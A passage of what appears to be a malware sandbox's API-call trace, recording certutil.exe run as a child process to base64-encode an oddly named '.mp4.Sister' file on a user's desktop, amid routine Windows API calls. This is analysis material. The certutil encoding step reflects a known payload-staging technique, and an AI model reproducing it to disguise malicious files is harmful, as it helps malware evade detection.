wMsgFilterMax=0x0 | out: lpMsg=0xeabec7fa70) returned 0 [0235.606] LocalFree (hMem=0x2d9d6d5b710) returned 0x0 [0235.606] LocalFree (hMem=0x2d9d6d71570) returned 0x0 [0235.606] LocalFree (hMem=0x0) returned 0x0 [0235.607] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0235.607] GetLastError () returned 0x7e [0235.608] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0235.608] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0235.608] DllMain () returned 0x1 [0235.608] LocalFree (hMem=0x2d9d6d5b530) returned 0x0 [0235.608] LocalFree (hMem=0x2d9d6d520e0) returned 0x0 [0235.608] LocalFree (hMem=0x2d9d6d71180) returned 0x0 [0235.608] LocalFree (hMem=0x2d9d6d71660) returned 0x0 [0235.609] LocalFree (hMem=0x2d9d6d48b60) returned 0x0 [0235.609] LocalFree (hMem=0x2d9d6d71330) returned 0x0 [0235.609] LocalFree (hMem=0x2d9d6d4b730) returned 0x0 [0235.609] LocalFree (hMem=0x2d9d6d52230) returned 0x0 [0235.609] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0235.609] GetLastError () returned 0x7e [0235.609] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0235.609] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0235.610] DllMain () returned 0x1 [0235.610] exit (_Code=0) Thread: id = 64 os_tid = 0x1320 Process: id = "22" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1cc64000" os_pid = "0x1018" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"Mhg3G6nMJa5mU0.mp4.Sister\" \"Mhg3G6nMJa5mU0.mp4.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 65 os_tid = 0x4b4 [0236.406] GetStartupInfoW (in: lpStartupInfo=0xfa008ef8b0 | out: lpStartupInfo=0xfa008ef8b0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"Mhg3G6nMJa5mU0.mp4.Sister\" \"Mhg3G6nMJa5mU0.mp4.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0236.406] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0236.406] __set_app_type (_Type=0x1) [0236.406] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0236.407] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0236.409] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0236.410] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0236.410] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0236.410] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0236.410] WerSetFlags () returned 0x0 [0236.411] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0236.411] __iob_func () returned 0x7ffcea2dea00 [0236.411] _fileno (_File=0x7ffcea2dea30) returned 1 [0236.411] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0236.411] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0236.412] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0236.412] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0236.413] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0236.413] GetConsoleOutputCP () returned 0x1b5 [0236.482] _vsnwprintf (in: _Buffer=0xfa008ef820, _BufferCount=0xb, _Format=".%d", _ArgList=0xfa008ef748 | out: _Buffer=".437") returned 4 [0236.482] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0236.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0236.482] GetFileType (hFile=0x50) returned 0x2 [0236.482] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0236.483] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0236.483] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.553] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0236.588] GetCommandLineW () returned="certutil -encode \"Mhg3G6nMJa5mU0.mp4.Sister\" \"Mhg3G6nMJa5mU0.mp4.Cruel\"" [0236.588] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2e2c601b410 [0236.588] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2e2c600cb80 [0236.588] LocalFree (hMem=0x2e2c601b410) returned 0x0 [0236.588] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2e2c600bf90 [0236.588] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x2e2c600c020 [0236.588] LocalFree (hMem=0x2e2c600bf90) returned 0x0 [0236.588] LocalFree (hMem=0x2e2c600cb80) returned 0x0 [0236.588] LocalFree (hMem=0x0) returned 0x0 [0236.588] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0236.588] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0236.589] GetCommandLineW () returned="certutil -encode \"Mhg3G6nMJa5mU0.mp4.Sister\" \"Mhg3G6nMJa5mU0.mp4.Cruel\"" [0236.589] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x2e2c601b7d0 [0236.589] GetSystemTime (in: lpSystemTime=0xfa008ef510 | out: lpSystemTime=0xfa008ef510*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0xb, wMilliseconds=0x82)) [0236.589] SystemTimeToFileTime (in: lpSystemTime=0xfa008ef510, lpFileTime=0xfa008ef508 | out: lpFileTime=0xfa008ef508) returned 1 [0236.590] FileTimeToLocalFileTime (in: lpFileTime=0xfa008ef508, lpLocalFileTime=0xfa008ef4d0 | out: lpLocalFileTime=0xfa008ef4d0) returned 1 [0236.590] FileTimeToSystemTime (in: lpFileTime=0xfa008ef4d0, lpSystemTime=0xfa008ef240 | out: lpSystemTime=0xfa008ef240) returned 1 [0236.590] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xfa008ef240, lpFormat=0x0, lpDateStr=0xfa008ef350, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0236.590] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xfa008ef240, lpFormat=0x0, lpTimeStr=0xfa008ef250, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0236.590] _vsnwprintf (in: _Buffer=0xfa008ef25e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xfa008ef228 | out: _Buffer=" 11.130s") returned 8 [0236.590] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x2e2c601df50 [0236.590] SetLastError (dwErrCode=0x80070716) [0236.590] _vsnwprintf (in: _Buffer=0xfa008ef2d8, _BufferCount=0xb, _Format="%d", _ArgList=0xfa008ef2c8 | out: _Buffer="948") returned 3 [0236.590] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xfa008ef090, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0236.590] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x2e2c601ba30 [0236.590] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x2e2c6014510 [0236.591] LocalFree (hMem=0x2e2c601df50) returned 0x0 [0236.591] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xfa008ef580 | out: lpSystemTimeAsFileTime=0xfa008ef580*(dwLowDateTime=0xb7a0be9f, dwHighDateTime=0x1d6141f)) [0236.591] GetLocalTime (in: lpSystemTime=0xfa008ef5b8 | out: lpSystemTime=0xfa008ef5b8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0xb, wMilliseconds=0x83)) [0236.591] SystemTimeToFileTime (in: lpSystemTime=0xfa008ef5b8, lpFileTime=0xfa008ef590 | out: lpFileTime=0xfa008ef590) returned 1 [0236.591] CompareFileTime (lpFileTime1=0xfa008ef590, lpFileTime2=0xfa008ef580) returned 1 [0236.591] _vsnwprintf (in: _Buffer=0xfa008ef5c8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xfa008ef558 | out: _Buffer="GMT + 2.00") returned 10 [0236.591] LocalFree (hMem=0x2e2c601b7d0) returned 0x0 [0236.591] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0236.592] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0236.592] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0236.592] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0236.592] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0236.592] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xfa008ef5f8 | out: _Buffer="10.0.15063.447") returned 14 [0236.592] GetACP () returned 0x4e4 [0236.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0236.592] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2e2c601b570 [0236.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2e2c601b570, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0236.592] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2e2c601df10 [0236.592] _vsnwprintf (in: _Buffer=0x2e2c601df10, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xfa008ef648 | out: _Buffer="10.0.15063.447 retail") returned 21 [0236.592] LocalFree (hMem=0x2e2c601b570) returned 0x0 [0236.592] LocalFree (hMem=0x0) returned 0x0 [0236.592] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0236.592] GetACP () returned 0x4e4 [0236.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0236.592] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2e2c601b8d0 [0236.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2e2c601b8d0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0236.593] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2e2c601e290 [0236.593] _vsnwprintf (in: _Buffer=0x2e2c601e290, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xfa008ef648 | out: _Buffer="10.0.15063.447 retail") returned 21 [0236.593] LocalFree (hMem=0x2e2c601b8d0) returned 0x0 [0236.593] LocalFree (hMem=0x0) returned 0x0 [0236.593] GetACP () returned 0x4e4 [0236.593] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0236.593] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2e2c601b930 [0236.593] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x2e2c601b930, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0236.593] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2e2c601dc50 [0236.593] _vsnwprintf (in: _Buffer=0x2e2c601dc50, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xfa008ef678 | out: _Buffer="10.0.15063.447 retail") returned 21 [0236.593] LocalFree (hMem=0x2e2c601b930) returned 0x0 [0236.593] LocalFree (hMem=0x2e2c601df10) returned 0x0 [0236.593] LocalFree (hMem=0x2e2c601e290) returned 0x0 [0236.593] LocalFree (hMem=0x2e2c601dc50) returned 0x0 [0236.593] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0236.593] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0236.593] GetStockObject (i=0) returned 0x900010 [0236.594] RegisterClassW (lpWndClass=0xfa008ef7a0) returned 0xc1a2 [0236.594] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1f02be [0236.695] NtdllDefWindowProc_W () returned 0x0 [0236.696] NtdllDefWindowProc_W () returned 0x1 [0236.702] NtdllDefWindowProc_W () returned 0x0 [0236.712] UpdateWindow (hWnd=0x1f02be) returned 1 [0236.712] PostMessageW (hWnd=0x1f02be, Msg=0x400, wParam=0x0, lParam=0x2e2c600217e) returned 1 [0236.712] GetMessageW (in: lpMsg=0xfa008ef7f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xfa008ef7f0) returned 1 [0236.712] TranslateMessage (lpMsg=0xfa008ef7f0) returned 0 [0236.712] DispatchMessageW (lpMsg=0xfa008ef7f0) returned 0x0 [0236.712] NtdllDefWindowProc_W () returned 0x0 [0236.712] GetMessageW (in: lpMsg=0xfa008ef7f0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xfa008ef7f0) returned 1 [0236.713] TranslateMessage (lpMsg=0xfa008ef7f0) returned 0 [0236.713] DispatchMessageW (lpMsg=0xfa008ef7f0) returned 0x0 [0236.713] LocalAlloc (uFlags=0x0, uBytes=0x7e) returned 0x2e2c60095a0 [0236.713] LocalAlloc (uFlags=0x0, uBytes=0x8a) returned 0x2e2c600b280 [0236.713] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0236.713] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0236.713] SetLastError (dwErrCode=0x80070716) [0236.713] _vsnwprintf (in: _Buffer=0xfa008ef1f8, _BufferCount=0xb, _Format="%d", _ArgList=0xfa008ef1e8 | out: _Buffer="465") returned 3 [0236.713] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xfa008eefb0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0236.713] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2e2c600c170 [0236.713] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0236.713] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0236.713] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xfa008eef90, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0236.713] GetLastError () returned 0xcb [0236.714] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0236.714] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0236.714] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0236.714] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0236.714] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0236.714] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0236.714] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0236.714] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0236.714] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0236.714] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0236.714] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0236.714] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0236.714] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0236.714] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0236.714] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0236.714] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0236.714] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0236.714] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0236.714] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0236.714] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0236.714] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0236.714] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xfa008eec58 | out: phkResult=0xfa008eec58*=0x23c) returned 0x0 [0236.715] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2e2c6009790 [0236.715] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xfa008ef1c8, lpData=0xfa008ef1f8, lpcbData=0xfa008ef1c0*=0x4 | out: lpType=0xfa008ef1c8*=0x0, lpData=0xfa008ef1f8*=0x0, lpcbData=0xfa008ef1c0*=0x4) returned 0x2 [0236.715] LocalFree (hMem=0x2e2c6009790) returned 0x0 [0236.715] RegCloseKey (hKey=0x23c) returned 0x0 [0236.715] LocalFree (hMem=0x0) returned 0x0 [0236.715] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2e2c602cf00 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0236.728] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0236.728] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0236.728] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2e2c6031eb0 [0236.728] GetComputerNameW (in: lpBuffer=0x2e2c6031eb0, nSize=0xfa008ef1c0 | out: lpBuffer="NQDPDE", nSize=0xfa008ef1c0) returned 1 [0236.729] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xfa008ef190 | out: lpBuffer=0x0, nSize=0xfa008ef190) returned 0 [0236.729] GetLastError () returned 0xea [0236.729] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2e2c601b650 [0236.729] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2e2c601b650, nSize=0xfa008ef190 | out: lpBuffer="NQdPdE", nSize=0xfa008ef190) returned 1 [0236.729] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0236.803] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2e2c6032040, cbCertEncoded=0xc828) returned 0x0 [0236.807] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2e2c6032040, cbCrlEncoded=0xc828) returned 0x0 [0236.809] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2e2c6032040, cbEncoded=0xc828, dwFlags=0x8000, pDecodePara=0xfa008ef070, pvStructInfo=0xfa008ef100, pcbStructInfo=0xfa008ef0f4 | out: pvStructInfo=0xfa008ef100, pcbStructInfo=0xfa008ef0f4) returned 0 [0236.809] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2e2c6032040, cbEncoded=0xc828, dwFlags=0x8000, pDecodePara=0xfa008ef070, pvStructInfo=0xfa008ef100, pcbStructInfo=0xfa008ef0f4 | out: pvStructInfo=0xfa008ef100, pcbStructInfo=0xfa008ef0f4) returned 0 [0236.810] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2e2c6032040, cbEncoded=0xc828, dwFlags=0x8000, pDecodePara=0xfa008ef070, pvStructInfo=0xfa008ef100, pcbStructInfo=0xfa008ef0f4 | out: pvStructInfo=0xfa008ef100, pcbStructInfo=0xfa008ef0f4) returned 0 [0236.810] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2e2c600d010 [0236.819] CryptMsgUpdate (hCryptMsg=0x2e2c600d010, pbData=0x2e2c6032040, cbData=0xc828, fFinal=1) returned 0 [0236.819] GetLastError () returned 0x8009310b [0236.819] CryptMsgClose (hCryptMsg=0x2e2c600d010) returned 1 [0236.819] GetFileAttributesExW (in: lpFileName="Mhg3G6nMJa5mU0.mp4.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\mhg3g6nmja5mu0.mp4.sister"), fInfoLevelId=0x0, lpFileInformation=0xfa008ef120 | out: lpFileInformation=0xfa008ef120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9bdbd0, ftCreationTime.dwHighDateTime=0x1d5ebdb, ftLastAccessTime.dwLowDateTime=0x2c541020, ftLastAccessTime.dwHighDateTime=0x1d5e64b, ftLastWriteTime.dwLowDateTime=0x2c541020, ftLastWriteTime.dwHighDateTime=0x1d5e64b, nFileSizeHigh=0x0, nFileSizeLow=0xc828)) returned 1 [0236.819] _vsnwprintf (in: _Buffer=0xfa008ef128, _BufferCount=0xb, _Format="%d", _ArgList=0xfa008ef118 | out: _Buffer="359") returned 3 [0236.819] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xfa008eeee0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0236.819] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2e2c6031c70 [0236.819] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0236.819] _vsnwprintf (in: _Buffer=0xfa008ee110, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xfa008ef168 | out: _Buffer="Input Length = 51240") returned 20 [0236.820] GetFileType (hFile=0x50) returned 0x2 [0236.820] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfa008ee110*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xfa008ee0c4, lpReserved=0x0 | out: lpBuffer=0xfa008ee110*, lpNumberOfCharsWritten=0xfa008ee0c4*=0x14) returned 1 [0236.937] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0236.938] _vsnwprintf (in: _Buffer=0xfa008ee110, _BufferCount=0x1ff, _Format="\n", _ArgList=0xfa008ef168 | out: _Buffer="\n") returned 1 [0236.938] GetFileType (hFile=0x50) returned 0x2 [0236.938] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfa008ee110*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xfa008ee0c4, lpReserved=0x0 | out: lpBuffer=0xfa008ee110*, lpNumberOfCharsWritten=0xfa008ee0c4*=0x1) returned 1 [0237.152] GetFileAttributesExW (in: lpFileName="Mhg3G6nMJa5mU0.mp4.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\mhg3g6nmja5mu0.mp4.cruel"), fInfoLevelId=0x0, lpFileInformation=0xfa008ef120 | out: lpFileInformation=0xfa008ef120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e281eb, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xb7e281eb, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb7e91e5e, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x11370)) returned 1 [0237.152] _vsnwprintf (in: _Buffer=0xfa008ef128, _BufferCount=0xb, _Format="%d", _ArgList=0xfa008ef118 | out: _Buffer="361") returned 3 [0237.152] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xfa008eeee0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0237.152] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2e2c6031d30 [0237.152] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0237.152] _vsnwprintf (in: _Buffer=0xfa008ee110, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xfa008ef168 | out: _Buffer="Output Length = 70512") returned 21 [0237.152] GetFileType (hFile=0x50) returned 0x2 [0237.152] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xfa008ee110*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xfa008ee0c4, lpReserved=0x0 | out: lpBuffer=0xfa008ee110*, lpNumberOfCharsWritten=0xfa008ee0c4*=0x15) returned 1 [0237.256] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0237.257] _vsnwprintf (in: _Buffer=0xfa008ee110, _BufferCount=0x1ff, _Format="\n", _ArgList=0xfa008ef168 | out: _Buffer="\n") returned 1 [0237.257] GetFileType (hFile=0x50) returned 